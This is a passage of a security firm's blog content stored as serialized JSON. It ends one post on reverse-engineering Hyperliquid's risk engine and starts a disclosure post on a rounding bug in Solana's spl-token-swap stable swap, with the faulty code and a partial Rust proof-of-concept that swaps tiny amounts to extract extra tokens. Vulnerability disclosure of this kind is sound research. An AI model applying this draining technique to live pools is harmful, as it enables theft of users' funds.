here:",{"type":25,"tag":524,"props":6669,"children":6672},{"path":6670,"name":87,"size":6671},"https://blog-assets.osec.io/hyperliquid-risk-engine/hl-node",53573376,[],{"type":25,"tag":606,"props":6674,"children":6676},{"id":6675},"closing-words",[6677],{"type":31,"value":6678},"Closing Words",{"type":25,"tag":38,"props":6680,"children":6681},{},[6682],{"type":31,"value":6683},"As much as it would be exciting to say that everything can be cracked open and studied in the age of LLMs, there are still some gaps to bridge.",{"type":25,"tag":38,"props":6685,"children":6686},{},[6687,6689,6694],{"type":31,"value":6688},"Flagship models got us 60% of the way there, but a lot of ",{"type":25,"tag":64,"props":6690,"children":6691},{},[6692],{"type":31,"value":6693},"manual",{"type":31,"value":6695}," work is still required: on one hand, documenting patterns in the Rust compiler and distilling that knowledge onto agents and tools; on the other, understanding the \"whys\" behind a program, beyond the technical question of the \"what\".",{"type":25,"tag":38,"props":6697,"children":6698},{},[6699],{"type":31,"value":6700},"Still, there is no doubt that LLMs have greatly accelerated progress in the field, and the dream of throwing a well-armed swarm of agents at an ugly blob of machine code to extract meaningful—and, most importantly, correct—representations and source code is nearing.",{"type":25,"tag":38,"props":6702,"children":6703},{},[6704],{"type":31,"value":6705},"We hope to be part of that future, where even complex and obfuscated systems will be verifiable at a glance.",{"type":25,"tag":6707,"props":6708,"children":6709},"report-footnotes",{},[6710],{"type":25,"tag":6711,"props":6712,"children":6713},"ol",{},[6714,6719,6746,6751,6756],{"type":25,"tag":2043,"props":6715,"children":6716},{},[6717],{"type":31,"value":6718},"ADL crashes the node upon failure. Specifically, if we don't manage to complete all of the fills against anybody, an assertion in the loop fails.",{"type":25,"tag":2043,"props":6720,"children":6721},{},[6722,6728,6730,6736,6738,6744],{"type":25,"tag":82,"props":6723,"children":6725},{"className":6724},[],[6726],{"type":31,"value":6727},"compute_user_margin_and_shortfall",{"type":31,"value":6729}," is a ubiquitous function for accounting. In its main branch, we loop over a B-tree (note the repeating offsets ",{"type":25,"tag":82,"props":6731,"children":6733},{"className":6732},[],[6734],{"type":31,"value":6735},"0x748",{"type":31,"value":6737}," in the abstract expressions of ",{"type":25,"tag":82,"props":6739,"children":6741},{"className":6740},[],[6742],{"type":31,"value":6743},"btree_cursor",{"type":31,"value":6745},") of per-user positions, branching out based on cross/isolated positions (in order to know what to consider for notional).",{"type":25,"tag":2043,"props":6747,"children":6748},{},[6749],{"type":31,"value":6750},"Also, the specifics of how prices are fetched have been hand-waved for simplicity, but the system is pessimistic at every step when computing notionals.",{"type":25,"tag":2043,"props":6752,"children":6753},{},[6754],{"type":31,"value":6755},"Some loop iterations within the ADL code look very inefficient; for example, we seem to sort and come up with sorted counterparties for each position to be absorbed.",{"type":25,"tag":2043,"props":6757,"children":6758},{},[6759,6761,6767],{"type":31,"value":6760},"Some of the historical data from Hyperliquid can be retrieved via this S3 bucket: ",{"type":25,"tag":82,"props":6762,"children":6764},{"className":6763},[],[6765],{"type":31,"value":6766},"s3://hl-mainnet-node-data/explorer_blocks",{"type":31,"value":179},{"title":7,"searchDepth":6769,"depth":6769,"links":6770},2,[6771,6772,6773,6774,6775,6779,6780,6781,6784,6785,6788,6792],{"id":28,"depth":6769,"text":32},{"id":18,"depth":6769,"text":52},{"id":111,"depth":6769,"text":114},{"id":431,"depth":6769,"text":434},{"id":466,"depth":6769,"text":469,"children":6776},[6777],{"id":608,"depth":6778,"text":611},3,{"id":1392,"depth":6769,"text":1395},{"id":1489,"depth":6769,"text":1492},{"id":1709,"depth":6769,"text":1712,"children":6782},[6783],{"id":1961,"depth":6778,"text":1964},{"id":2021,"depth":6769,"text":2024},{"id":6454,"depth":6769,"text":6457,"children":6786},[6787],{"id":6487,"depth":6778,"text":6490},{"id":6547,"depth":6769,"text":6550,"children":6789},[6790,6791],{"id":6553,"depth":6778,"text":6556},{"id":6572,"depth":6778,"text":2060},{"id":6602,"depth":6769,"text":6605,"children":6793},[6794,6795,6796,6797],{"id":6613,"depth":6778,"text":6616},{"id":6635,"depth":6778,"text":6638},{"id":6651,"depth":6778,"text":6654},{"id":6675,"depth":6778,"text":6678},"markdown","content:blog:2026-06-22-hyperliquid-risk-engine.md","content","blog/2026-06-22-hyperliquid-risk-engine.md","blog/2026-06-22-hyperliquid-risk-engine","md",[6805,9330,9666,13215,17572,22705,32962,34394,35157,39384,44411,49842,50999,54489,64881,71610,73449,75159,79824,93722,96443,101219,103659,106004,111790,127584,135884,145807,151083,160476,162813],{"_path":6806,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":6807,"description":6808,"image":6809,"date":6813,"isFeatured":16,"tags":6814,"onBlogPage":16,"body":6817,"_type":6798,"_id":9327,"_source":6800,"_file":9328,"_stem":9329,"_extension":6803},"/blog/2022-04-26-spl-swap-rounding","Becoming a Millionaire, 0.000150 BTC at a Time","How we discovered a critical issue in Solana's stable swap implementation. A story about arbitrage and rounding.",{"src":6810,"width":6811,"height":6812},"/posts/spl-swap/title.jpg",600,368,"2022-04-26",[6815,6816],"solana","report",{"type":22,"children":6818,"toc":9321},[6819,6833,6838,6843,6851,6857,6862,6867,6875,6883,6888,6893,6901,6906,6911,7312,7322,7327,7875,7880,7888,7895,7901,7906,7911,7916,7923,7935,7940,7952,8161,8166,8171,8177,8182,8187,8234,8239,8247,8252,8257,8262,8406,8419,8534,8548,8556,8570,8578,8591,8596,8608,8616,8638,9256,9262,9267,9280,9293,9300,9305,9310,9315],{"type":25,"tag":38,"props":6820,"children":6821},{},[6822,6824,6831],{"type":31,"value":6823},"We discovered a critical rounding issue in the Solana Program Library's implementation of stable swap, ",{"type":25,"tag":162,"props":6825,"children":6828},{"href":6826,"rel":6827},"https://github.com/solana-labs/solana-program-library/tree/master/token-swap/program",[166],[6829],{"type":31,"value":6830},"spl-token-swap",{"type":31,"value":6832},". Similar to Neodyme's spl-token-lending exploit, we were able to extract a single token per instruction. This exceeds the value of the 5000 lamport transaction fee on BTC stable swaps, allowing an attacker to profitably drain funds.",{"type":25,"tag":38,"props":6834,"children":6835},{},[6836],{"type":31,"value":6837},"Such BTC stable swaps had over 74 million in combined value. The total value of stable swaps impacted exceed 700 million.",{"type":25,"tag":38,"props":6839,"children":6840},{},[6841],{"type":31,"value":6842},"We would also like to thank the Saber team for their fast triage and remediation.",{"type":25,"tag":38,"props":6844,"children":6845},{},[6846],{"type":25,"tag":64,"props":6847,"children":6848},{},[6849],{"type":31,"value":6850},"Rounding bugs are an increasingly common vulnerability class, enabled by low transaction costs",{"type":25,"tag":26,"props":6852,"children":6854},{"id":6853},"discovery",[6855],{"type":31,"value":6856},"Discovery",{"type":25,"tag":38,"props":6858,"children":6859},{},[6860],{"type":31,"value":6861},"Parth, one of our researchers, was implementing a graph search for our arbitrage bot to calculate the price of any token relative to SOL.",{"type":25,"tag":38,"props":6863,"children":6864},{},[6865],{"type":31,"value":6866},"After a while, he noticed something weird..",{"type":25,"tag":34,"props":6868,"children":6869},{},[6870],{"type":25,"tag":38,"props":6871,"children":6872},{},[6873],{"type":31,"value":6874},"so either my graph search is wrong\nor its possible to get a ton of money out of nothing",{"type":25,"tag":206,"props":6876,"children":6878},{"code":6877},"KwnjUuZ :              0 9vMJfxu ->              1 EPjFWdd\nKwnjUuZ :              1 EPjFWdd ->              2 9vMJfxu\nKwnjUuZ :              2 9vMJfxu ->              3 EPjFWdd\nHU1tejU :              3 EPjFWdd ->            625 PRT88Rk\n24ZbKS3 :            625 PRT88Rk ->              7 EPjFWdd\n3oRPcFa :              7 EPjFWdd ->              6 BQcdHdA\n",[6879],{"type":25,"tag":82,"props":6880,"children":6881},{"__ignoreMap":7},[6882],{"type":31,"value":6877},{"type":25,"tag":38,"props":6884,"children":6885},{},[6886],{"type":31,"value":6887},"Somehow, we were getting tokens from nothing?",{"type":25,"tag":38,"props":6889,"children":6890},{},[6891],{"type":31,"value":6892},"After taking a look at the pairs on which this was occuring, we quickly realized that only stable swap pairs were impacted.",{"type":25,"tag":206,"props":6894,"children":6896},{"code":6895},"KwnjUuZhTMTSGAaavkLEmSyfobY16JNH4poL9oeeEvE\nHU1tejUtt7AZYrC9SAuqCW9MpuSqsdoedHSb1XUKjUPN\n24ZbKS36rkPv14Tdx8qv4NRyqatTaJ5KgJrT1LxBKn5d\n3oRPcFaRHvv9pPR6nRasigVDkm3k9kTjdfjxUpgLV5Pq\n",[6897],{"type":25,"tag":82,"props":6898,"children":6899},{"__ignoreMap":7},[6900],{"type":31,"value":6895},{"type":25,"tag":38,"props":6902,"children":6903},{},[6904],{"type":31,"value":6905},"This seemed suspicious. Perhaps it had something to do with the stable swap math?",{"type":25,"tag":38,"props":6907,"children":6908},{},[6909],{"type":31,"value":6910},"It was also weird how we could only ever get at most one extra token. As usual, the best way to answer such questions is to read the code. We dived into the stable swap Solana implementation to look for a possible root cause.",{"type":25,"tag":206,"props":6912,"children":6916},{"code":6913,"language":6914,"meta":7,"className":6915,"style":7},"    // Solve for y by approximating: y**2 + b*y = c\n    let mut y = d_val;\n    for _ in 0..ITERATIONS {\n        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n        if y_new == y {\n            break;\n        } else {\n            y = y_new;\n        }\n    }\n","rust","language-rust shiki shiki-themes slack-dark",[6917],{"type":25,"tag":82,"props":6918,"children":6919},{"__ignoreMap":7},[6920,6931,6968,7003,7108,7214,7242,7255,7273,7294,7303],{"type":25,"tag":216,"props":6921,"children":6924},{"class":6922,"line":6923},"line",1,[6925],{"type":25,"tag":216,"props":6926,"children":6928},{"style":6927},"--shiki-default:#6A9955",[6929],{"type":31,"value":6930},"    // Solve for y by approximating: y**2 + b*y = c\n",{"type":25,"tag":216,"props":6932,"children":6933},{"class":6922,"line":6769},[6934,6940,6945,6951,6957,6962],{"type":25,"tag":216,"props":6935,"children":6937},{"style":6936},"--shiki-default:#569CD6",[6938],{"type":31,"value":6939},"    let",{"type":25,"tag":216,"props":6941,"children":6942},{"style":6936},[6943],{"type":31,"value":6944}," mut",{"type":25,"tag":216,"props":6946,"children":6948},{"style":6947},"--shiki-default:#9CDCFE",[6949],{"type":31,"value":6950}," y",{"type":25,"tag":216,"props":6952,"children":6954},{"style":6953},"--shiki-default:#D4D4D4",[6955],{"type":31,"value":6956}," =",{"type":25,"tag":216,"props":6958,"children":6959},{"style":6947},[6960],{"type":31,"value":6961}," d_val",{"type":25,"tag":216,"props":6963,"children":6965},{"style":6964},"--shiki-default:#E6E6E6",[6966],{"type":31,"value":6967},";\n",{"type":25,"tag":216,"props":6969,"children":6970},{"class":6922,"line":6778},[6971,6977,6982,6987,6993,6998],{"type":25,"tag":216,"props":6972,"children":6974},{"style":6973},"--shiki-default:#C586C0",[6975],{"type":31,"value":6976},"    for",{"type":25,"tag":216,"props":6978,"children":6979},{"style":6947},[6980],{"type":31,"value":6981}," _",{"type":25,"tag":216,"props":6983,"children":6984},{"style":6936},[6985],{"type":31,"value":6986}," in",{"type":25,"tag":216,"props":6988,"children":6990},{"style":6989},"--shiki-default:#B5CEA8",[6991],{"type":31,"value":6992}," 0",{"type":25,"tag":216,"props":6994,"children":6995},{"style":6953},[6996],{"type":31,"value":6997},"..",{"type":25,"tag":216,"props":6999,"children":7000},{"style":6964},[7001],{"type":31,"value":7002},"ITERATIONS {\n",{"type":25,"tag":216,"props":7004,"children":7006},{"class":6922,"line":7005},4,[7007,7012,7017,7022,7027,7032,7037,7041,7045,7051,7055,7060,7065,7069,7073,7077,7082,7087,7091,7095,7099,7103],{"type":25,"tag":216,"props":7008,"children":7009},{"style":6936},[7010],{"type":31,"value":7011},"        let",{"type":25,"tag":216,"props":7013,"children":7014},{"style":6964},[7015],{"type":31,"value":7016}," (",{"type":25,"tag":216,"props":7018,"children":7019},{"style":6947},[7020],{"type":31,"value":7021},"y_new",{"type":25,"tag":216,"props":7023,"children":7024},{"style":6964},[7025],{"type":31,"value":7026},", ",{"type":25,"tag":216,"props":7028,"children":7029},{"style":6947},[7030],{"type":31,"value":7031},"_",{"type":25,"tag":216,"props":7033,"children":7034},{"style":6964},[7035],{"type":31,"value":7036},") ",{"type":25,"tag":216,"props":7038,"children":7039},{"style":6953},[7040],{"type":31,"value":266},{"type":25,"tag":216,"props":7042,"children":7043},{"style":6964},[7044],{"type":31,"value":7016},{"type":25,"tag":216,"props":7046,"children":7048},{"style":7047},"--shiki-default:#DCDCAA",[7049],{"type":31,"value":7050},"checked_u8_power",{"type":25,"tag":216,"props":7052,"children":7053},{"style":6964},[7054],{"type":31,"value":1850},{"type":25,"tag":216,"props":7056,"children":7057},{"style":6953},[7058],{"type":31,"value":7059},"&",{"type":25,"tag":216,"props":7061,"children":7062},{"style":6947},[7063],{"type":31,"value":7064},"y",{"type":25,"tag":216,"props":7066,"children":7067},{"style":6964},[7068],{"type":31,"value":7026},{"type":25,"tag":216,"props":7070,"children":7071},{"style":6989},[7072],{"type":31,"value":331},{"type":25,"tag":216,"props":7074,"children":7075},{"style":6964},[7076],{"type":31,"value":1888},{"type":25,"tag":216,"props":7078,"children":7079},{"style":6953},[7080],{"type":31,"value":7081},"?.",{"type":25,"tag":216,"props":7083,"children":7084},{"style":7047},[7085],{"type":31,"value":7086},"checked_add",{"type":25,"tag":216,"props":7088,"children":7089},{"style":6964},[7090],{"type":31,"value":1850},{"type":25,"tag":216,"props":7092,"children":7093},{"style":6947},[7094],{"type":31,"value":2254},{"type":25,"tag":216,"props":7096,"children":7097},{"style":6964},[7098],{"type":31,"value":1888},{"type":25,"tag":216,"props":7100,"children":7101},{"style":6953},[7102],{"type":31,"value":604},{"type":25,"tag":216,"props":7104,"children":7105},{"style":6964},[7106],{"type":31,"value":7107},")\n",{"type":25,"tag":216,"props":7109,"children":7111},{"class":6922,"line":7110},5,[7112,7117,7122,7126,7131,7135,7139,7143,7147,7151,7155,7159,7163,7167,7172,7176,7180,7185,7189,7194,7198,7202,7206,7210],{"type":25,"tag":216,"props":7113,"children":7114},{"style":6953},[7115],{"type":31,"value":7116},"            .",{"type":25,"tag":216,"props":7118,"children":7119},{"style":7047},[7120],{"type":31,"value":7121},"checked_ceil_div",{"type":25,"tag":216,"props":7123,"children":7124},{"style":6964},[7125],{"type":31,"value":1850},{"type":25,"tag":216,"props":7127,"children":7128},{"style":7047},[7129],{"type":31,"value":7130},"checked_u8_mul",{"type":25,"tag":216,"props":7132,"children":7133},{"style":6964},[7134],{"type":31,"value":1850},{"type":25,"tag":216,"props":7136,"children":7137},{"style":6953},[7138],{"type":31,"value":7059},{"type":25,"tag":216,"props":7140,"children":7141},{"style":6947},[7142],{"type":31,"value":7064},{"type":25,"tag":216,"props":7144,"children":7145},{"style":6964},[7146],{"type":31,"value":7026},{"type":25,"tag":216,"props":7148,"children":7149},{"style":6989},[7150],{"type":31,"value":331},{"type":25,"tag":216,"props":7152,"children":7153},{"style":6964},[7154],{"type":31,"value":1888},{"type":25,"tag":216,"props":7156,"children":7157},{"style":6953},[7158],{"type":31,"value":7081},{"type":25,"tag":216,"props":7160,"children":7161},{"style":7047},[7162],{"type":31,"value":7086},{"type":25,"tag":216,"props":7164,"children":7165},{"style":6964},[7166],{"type":31,"value":1850},{"type":25,"tag":216,"props":7168,"children":7169},{"style":6947},[7170],{"type":31,"value":7171},"b",{"type":25,"tag":216,"props":7173,"children":7174},{"style":6964},[7175],{"type":31,"value":1888},{"type":25,"tag":216,"props":7177,"children":7178},{"style":6953},[7179],{"type":31,"value":7081},{"type":25,"tag":216,"props":7181,"children":7182},{"style":7047},[7183],{"type":31,"value":7184},"checked_sub",{"type":25,"tag":216,"props":7186,"children":7187},{"style":6964},[7188],{"type":31,"value":1850},{"type":25,"tag":216,"props":7190,"children":7191},{"style":6947},[7192],{"type":31,"value":7193},"d_val",{"type":25,"tag":216,"props":7195,"children":7196},{"style":6964},[7197],{"type":31,"value":1888},{"type":25,"tag":216,"props":7199,"children":7200},{"style":6953},[7201],{"type":31,"value":604},{"type":25,"tag":216,"props":7203,"children":7204},{"style":6964},[7205],{"type":31,"value":1888},{"type":25,"tag":216,"props":7207,"children":7208},{"style":6953},[7209],{"type":31,"value":604},{"type":25,"tag":216,"props":7211,"children":7212},{"style":6964},[7213],{"type":31,"value":6967},{"type":25,"tag":216,"props":7215,"children":7217},{"class":6922,"line":7216},6,[7218,7223,7228,7233,7237],{"type":25,"tag":216,"props":7219,"children":7220},{"style":6973},[7221],{"type":31,"value":7222},"        if",{"type":25,"tag":216,"props":7224,"children":7225},{"style":6947},[7226],{"type":31,"value":7227}," y_new",{"type":25,"tag":216,"props":7229,"children":7230},{"style":6953},[7231],{"type":31,"value":7232}," ==",{"type":25,"tag":216,"props":7234,"children":7235},{"style":6947},[7236],{"type":31,"value":6950},{"type":25,"tag":216,"props":7238,"children":7239},{"style":6964},[7240],{"type":31,"value":7241}," {\n",{"type":25,"tag":216,"props":7243,"children":7245},{"class":6922,"line":7244},7,[7246,7251],{"type":25,"tag":216,"props":7247,"children":7248},{"style":6973},[7249],{"type":31,"value":7250},"            break",{"type":25,"tag":216,"props":7252,"children":7253},{"style":6964},[7254],{"type":31,"value":6967},{"type":25,"tag":216,"props":7256,"children":7258},{"class":6922,"line":7257},8,[7259,7264,7269],{"type":25,"tag":216,"props":7260,"children":7261},{"style":6964},[7262],{"type":31,"value":7263},"        } ",{"type":25,"tag":216,"props":7265,"children":7266},{"style":6973},[7267],{"type":31,"value":7268},"else",{"type":25,"tag":216,"props":7270,"children":7271},{"style":6964},[7272],{"type":31,"value":7241},{"type":25,"tag":216,"props":7274,"children":7276},{"class":6922,"line":7275},9,[7277,7282,7286,7290],{"type":25,"tag":216,"props":7278,"children":7279},{"style":6947},[7280],{"type":31,"value":7281},"            y",{"type":25,"tag":216,"props":7283,"children":7284},{"style":6953},[7285],{"type":31,"value":6956},{"type":25,"tag":216,"props":7287,"children":7288},{"style":6947},[7289],{"type":31,"value":7227},{"type":25,"tag":216,"props":7291,"children":7292},{"style":6964},[7293],{"type":31,"value":6967},{"type":25,"tag":216,"props":7295,"children":7297},{"class":6922,"line":7296},10,[7298],{"type":25,"tag":216,"props":7299,"children":7300},{"style":6964},[7301],{"type":31,"value":7302},"        }\n",{"type":25,"tag":216,"props":7304,"children":7306},{"class":6922,"line":7305},11,[7307],{"type":25,"tag":216,"props":7308,"children":7309},{"style":6964},[7310],{"type":31,"value":7311},"    }\n",{"type":25,"tag":38,"props":7313,"children":7314},{},[7315,7320],{"type":25,"tag":64,"props":7316,"children":7317},{},[7318],{"type":31,"value":7319},"approximate",{"type":31,"value":7321},". Looks suspicious.. Perhaps we really did find a bug in the Solana Program Library?",{"type":25,"tag":38,"props":7323,"children":7324},{},[7325],{"type":31,"value":7326},"With this promising find in mind, we decided to throw together a quick proof of concept. To do this, we attempted to swap very small amounts of tokens back and forth between sBTC and renBTC.",{"type":25,"tag":206,"props":7328,"children":7330},{"code":7329,"language":6914,"meta":7,"className":6915,"style":7},"// from sbtc to renbtc\nfor i in 0 .. 50u8 {\n    // create swap transaction\n    let mut swap_instruction = swap(\n        &spl_token::id(),\n        &swap_pubkey,\n        &swap_authority_pubkey,\n        &test_account_signer.pubkey(),\n        &sbtc_user_account,\n        &sbtc_reserve,\n        &renbtc_reserve,\n        &renbtc_user_account,\n        &admin_fee_account_sbtc_to_ren,\n        1,\n        2\n    ).unwrap();\n\n    // nonce\n    swap_instruction.data.append(&mut vec![i, extranonce]);\n\n    let mut instructions = vec![];\n\n    instructions.push(swap_instruction);\n\n    env.execute_as_transaction(&instructions, &vec![&test_account_signer]);\n}\n",[7331],{"type":25,"tag":82,"props":7332,"children":7333},{"__ignoreMap":7},[7334,7342,7383,7391,7421,7449,7466,7482,7507,7523,7539,7555,7572,7589,7602,7611,7634,7643,7652,7720,7728,7758,7766,7798,7806,7866],{"type":25,"tag":216,"props":7335,"children":7336},{"class":6922,"line":6923},[7337],{"type":25,"tag":216,"props":7338,"children":7339},{"style":6927},[7340],{"type":31,"value":7341},"// from sbtc to renbtc\n",{"type":25,"tag":216,"props":7343,"children":7344},{"class":6922,"line":6769},[7345,7350,7355,7359,7363,7368,7373,7379],{"type":25,"tag":216,"props":7346,"children":7347},{"style":6973},[7348],{"type":31,"value":7349},"for",{"type":25,"tag":216,"props":7351,"children":7352},{"style":6947},[7353],{"type":31,"value":7354}," i",{"type":25,"tag":216,"props":7356,"children":7357},{"style":6936},[7358],{"type":31,"value":6986},{"type":25,"tag":216,"props":7360,"children":7361},{"style":6989},[7362],{"type":31,"value":6992},{"type":25,"tag":216,"props":7364,"children":7365},{"style":6953},[7366],{"type":31,"value":7367}," ..",{"type":25,"tag":216,"props":7369,"children":7370},{"style":6989},[7371],{"type":31,"value":7372}," 50",{"type":25,"tag":216,"props":7374,"children":7376},{"style":7375},"--shiki-default:#4EC9B0",[7377],{"type":31,"value":7378},"u8",{"type":25,"tag":216,"props":7380,"children":7381},{"style":6964},[7382],{"type":31,"value":7241},{"type":25,"tag":216,"props":7384,"children":7385},{"class":6922,"line":6778},[7386],{"type":25,"tag":216,"props":7387,"children":7388},{"style":6927},[7389],{"type":31,"value":7390},"    // create swap transaction\n",{"type":25,"tag":216,"props":7392,"children":7393},{"class":6922,"line":7005},[7394,7398,7402,7407,7411,7416],{"type":25,"tag":216,"props":7395,"children":7396},{"style":6936},[7397],{"type":31,"value":6939},{"type":25,"tag":216,"props":7399,"children":7400},{"style":6936},[7401],{"type":31,"value":6944},{"type":25,"tag":216,"props":7403,"children":7404},{"style":6947},[7405],{"type":31,"value":7406}," swap_instruction",{"type":25,"tag":216,"props":7408,"children":7409},{"style":6953},[7410],{"type":31,"value":6956},{"type":25,"tag":216,"props":7412,"children":7413},{"style":7047},[7414],{"type":31,"value":7415}," swap",{"type":25,"tag":216,"props":7417,"children":7418},{"style":6964},[7419],{"type":31,"value":7420},"(\n",{"type":25,"tag":216,"props":7422,"children":7423},{"class":6922,"line":7110},[7424,7429,7434,7439,7444],{"type":25,"tag":216,"props":7425,"children":7426},{"style":6953},[7427],{"type":31,"value":7428},"        &",{"type":25,"tag":216,"props":7430,"children":7431},{"style":6964},[7432],{"type":31,"value":7433},"spl_token",{"type":25,"tag":216,"props":7435,"children":7436},{"style":6953},[7437],{"type":31,"value":7438},"::",{"type":25,"tag":216,"props":7440,"children":7441},{"style":7047},[7442],{"type":31,"value":7443},"id",{"type":25,"tag":216,"props":7445,"children":7446},{"style":6964},[7447],{"type":31,"value":7448},"(),\n",{"type":25,"tag":216,"props":7450,"children":7451},{"class":6922,"line":7216},[7452,7456,7461],{"type":25,"tag":216,"props":7453,"children":7454},{"style":6953},[7455],{"type":31,"value":7428},{"type":25,"tag":216,"props":7457,"children":7458},{"style":6947},[7459],{"type":31,"value":7460},"swap_pubkey",{"type":25,"tag":216,"props":7462,"children":7463},{"style":6964},[7464],{"type":31,"value":7465},",\n",{"type":25,"tag":216,"props":7467,"children":7468},{"class":6922,"line":7244},[7469,7473,7478],{"type":25,"tag":216,"props":7470,"children":7471},{"style":6953},[7472],{"type":31,"value":7428},{"type":25,"tag":216,"props":7474,"children":7475},{"style":6947},[7476],{"type":31,"value":7477},"swap_authority_pubkey",{"type":25,"tag":216,"props":7479,"children":7480},{"style":6964},[7481],{"type":31,"value":7465},{"type":25,"tag":216,"props":7483,"children":7484},{"class":6922,"line":7257},[7485,7489,7494,7498,7503],{"type":25,"tag":216,"props":7486,"children":7487},{"style":6953},[7488],{"type":31,"value":7428},{"type":25,"tag":216,"props":7490,"children":7491},{"style":6947},[7492],{"type":31,"value":7493},"test_account_signer",{"type":25,"tag":216,"props":7495,"children":7496},{"style":6953},[7497],{"type":31,"value":179},{"type":25,"tag":216,"props":7499,"children":7500},{"style":7047},[7501],{"type":31,"value":7502},"pubkey",{"type":25,"tag":216,"props":7504,"children":7505},{"style":6964},[7506],{"type":31,"value":7448},{"type":25,"tag":216,"props":7508,"children":7509},{"class":6922,"line":7275},[7510,7514,7519],{"type":25,"tag":216,"props":7511,"children":7512},{"style":6953},[7513],{"type":31,"value":7428},{"type":25,"tag":216,"props":7515,"children":7516},{"style":6947},[7517],{"type":31,"value":7518},"sbtc_user_account",{"type":25,"tag":216,"props":7520,"children":7521},{"style":6964},[7522],{"type":31,"value":7465},{"type":25,"tag":216,"props":7524,"children":7525},{"class":6922,"line":7296},[7526,7530,7535],{"type":25,"tag":216,"props":7527,"children":7528},{"style":6953},[7529],{"type":31,"value":7428},{"type":25,"tag":216,"props":7531,"children":7532},{"style":6947},[7533],{"type":31,"value":7534},"sbtc_reserve",{"type":25,"tag":216,"props":7536,"children":7537},{"style":6964},[7538],{"type":31,"value":7465},{"type":25,"tag":216,"props":7540,"children":7541},{"class":6922,"line":7305},[7542,7546,7551],{"type":25,"tag":216,"props":7543,"children":7544},{"style":6953},[7545],{"type":31,"value":7428},{"type":25,"tag":216,"props":7547,"children":7548},{"style":6947},[7549],{"type":31,"value":7550},"renbtc_reserve",{"type":25,"tag":216,"props":7552,"children":7553},{"style":6964},[7554],{"type":31,"value":7465},{"type":25,"tag":216,"props":7556,"children":7558},{"class":6922,"line":7557},12,[7559,7563,7568],{"type":25,"tag":216,"props":7560,"children":7561},{"style":6953},[7562],{"type":31,"value":7428},{"type":25,"tag":216,"props":7564,"children":7565},{"style":6947},[7566],{"type":31,"value":7567},"renbtc_user_account",{"type":25,"tag":216,"props":7569,"children":7570},{"style":6964},[7571],{"type":31,"value":7465},{"type":25,"tag":216,"props":7573,"children":7575},{"class":6922,"line":7574},13,[7576,7580,7585],{"type":25,"tag":216,"props":7577,"children":7578},{"style":6953},[7579],{"type":31,"value":7428},{"type":25,"tag":216,"props":7581,"children":7582},{"style":6947},[7583],{"type":31,"value":7584},"admin_fee_account_sbtc_to_ren",{"type":25,"tag":216,"props":7586,"children":7587},{"style":6964},[7588],{"type":31,"value":7465},{"type":25,"tag":216,"props":7590,"children":7592},{"class":6922,"line":7591},14,[7593,7598],{"type":25,"tag":216,"props":7594,"children":7595},{"style":6989},[7596],{"type":31,"value":7597},"        1",{"type":25,"tag":216,"props":7599,"children":7600},{"style":6964},[7601],{"type":31,"value":7465},{"type":25,"tag":216,"props":7603,"children":7605},{"class":6922,"line":7604},15,[7606],{"type":25,"tag":216,"props":7607,"children":7608},{"style":6989},[7609],{"type":31,"value":7610},"        2\n",{"type":25,"tag":216,"props":7612,"children":7614},{"class":6922,"line":7613},16,[7615,7620,7624,7629],{"type":25,"tag":216,"props":7616,"children":7617},{"style":6964},[7618],{"type":31,"value":7619},"    )",{"type":25,"tag":216,"props":7621,"children":7622},{"style":6953},[7623],{"type":31,"value":179},{"type":25,"tag":216,"props":7625,"children":7626},{"style":7047},[7627],{"type":31,"value":7628},"unwrap",{"type":25,"tag":216,"props":7630,"children":7631},{"style":6964},[7632],{"type":31,"value":7633},"();\n",{"type":25,"tag":216,"props":7635,"children":7637},{"class":6922,"line":7636},17,[7638],{"type":25,"tag":216,"props":7639,"children":7640},{"emptyLinePlaceholder":16},[7641],{"type":31,"value":7642},"\n",{"type":25,"tag":216,"props":7644,"children":7646},{"class":6922,"line":7645},18,[7647],{"type":25,"tag":216,"props":7648,"children":7649},{"style":6927},[7650],{"type":31,"value":7651},"    // nonce\n",{"type":25,"tag":216,"props":7653,"children":7655},{"class":6922,"line":7654},19,[7656,7661,7665,7670,7674,7679,7683,7687,7692,7697,7702,7706,7710,7715],{"type":25,"tag":216,"props":7657,"children":7658},{"style":6947},[7659],{"type":31,"value":7660},"    swap_instruction",{"type":25,"tag":216,"props":7662,"children":7663},{"style":6953},[7664],{"type":31,"value":179},{"type":25,"tag":216,"props":7666,"children":7667},{"style":6964},[7668],{"type":31,"value":7669},"data",{"type":25,"tag":216,"props":7671,"children":7672},{"style":6953},[7673],{"type":31,"value":179},{"type":25,"tag":216,"props":7675,"children":7676},{"style":7047},[7677],{"type":31,"value":7678},"append",{"type":25,"tag":216,"props":7680,"children":7681},{"style":6964},[7682],{"type":31,"value":1850},{"type":25,"tag":216,"props":7684,"children":7685},{"style":6953},[7686],{"type":31,"value":7059},{"type":25,"tag":216,"props":7688,"children":7689},{"style":6936},[7690],{"type":31,"value":7691},"mut",{"type":25,"tag":216,"props":7693,"children":7694},{"style":7047},[7695],{"type":31,"value":7696}," vec!",{"type":25,"tag":216,"props":7698,"children":7699},{"style":6964},[7700],{"type":31,"value":7701},"[",{"type":25,"tag":216,"props":7703,"children":7704},{"style":6947},[7705],{"type":31,"value":2289},{"type":25,"tag":216,"props":7707,"children":7708},{"style":6964},[7709],{"type":31,"value":7026},{"type":25,"tag":216,"props":7711,"children":7712},{"style":6947},[7713],{"type":31,"value":7714},"extranonce",{"type":25,"tag":216,"props":7716,"children":7717},{"style":6964},[7718],{"type":31,"value":7719},"]);\n",{"type":25,"tag":216,"props":7721,"children":7723},{"class":6922,"line":7722},20,[7724],{"type":25,"tag":216,"props":7725,"children":7726},{"emptyLinePlaceholder":16},[7727],{"type":31,"value":7642},{"type":25,"tag":216,"props":7729,"children":7731},{"class":6922,"line":7730},21,[7732,7736,7740,7745,7749,7753],{"type":25,"tag":216,"props":7733,"children":7734},{"style":6936},[7735],{"type":31,"value":6939},{"type":25,"tag":216,"props":7737,"children":7738},{"style":6936},[7739],{"type":31,"value":6944},{"type":25,"tag":216,"props":7741,"children":7742},{"style":6947},[7743],{"type":31,"value":7744}," 